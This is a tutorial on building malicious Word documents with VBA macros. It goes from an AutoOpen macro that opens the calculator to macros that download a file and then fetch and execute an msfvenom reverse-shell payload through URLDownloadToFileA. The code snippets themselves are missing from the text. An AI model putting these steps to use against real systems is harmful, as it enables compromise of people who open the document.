Malicious office documents are one of the main attack vectors for attackers trying to compromise a system.
There are 2 main methods to create a malicious Word Document:
- CVE-based.
- Functionality-based.
Both
methods have their pros and cons, but the main problem with the CVE-based
approach is that it usually requires certain versions of the software to be
used by target. In reality, we are not always aware of the exact version of the
software installed, so that using CVE-based approached can lead to a failed
attack attempt.
On the
other hand, functionality-based approach, as can be understood from the name,
uses functionalities that are part of the software itself (Microsoft Word, in
our case) and can be successfully executed on all versions of the software.
In the article the functionality-based approached will be discussed with the main focus on Macros.
Opening a calculator using a macro
First, a macro that launches calculator
when the document is opened will be created. In order to create a macro:
- Open a word document.
- Click “View” -> “Macros”.
- Enter a name for a new macro.
After the
steps, a new window is opened with an empty function template. Replace it with
the following code:
The macro
as most macros for Microsoft Office is written on VBA (Visual Basic for
Applications). So how does the macro work?
“Sub”
and “End Sub” are used to start and end the function declaration
accordingly.
“AutoOpen” is one of the auto macros
recognized by Microsoft Word that gets executed each time the document is opened.
“Shell” function is used to run an executable program. In the case, it is used to execute “calc.exe”.
Save the
macro and the document. Now when the document is opened, the macro will be executed.
Downloading a file using a macro
Going one step further a macro
that downloads a file from a hosted server when the document is opened will be
created. The following VBA code is used
for the purpose:
As can be
seen from the code snippet, the powershell commands can also be used in the macros.
The following macro downloads the text file from a server and saves it on a
target computer when the document is opened.
Download and execute a payload using a macro
Usually, the main purpose when
sending a malicious Word Document is to download a payload on the target
computer. To create a payload that creates a reverse shell connection msfvenom
was used:
The file was then hosted on a server.
While
writing a VBA script it is also possible to use WinAPI calls and use Windows
libraries in the macro:
First, the
“URLDownloadToFileA” function is declared, which is imported from “urlmon”
library. The function is then used in “DownloadFile” function to
download the malicious payload from the server. “AutoOpen” is then used
to download a file and execute it.
When the
document is opened the file is downloaded:
And
executed:
References
https://docs.microsoft.com/en-us/office/vba/word/concepts/customizing-word/auto-macros
https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/shell-function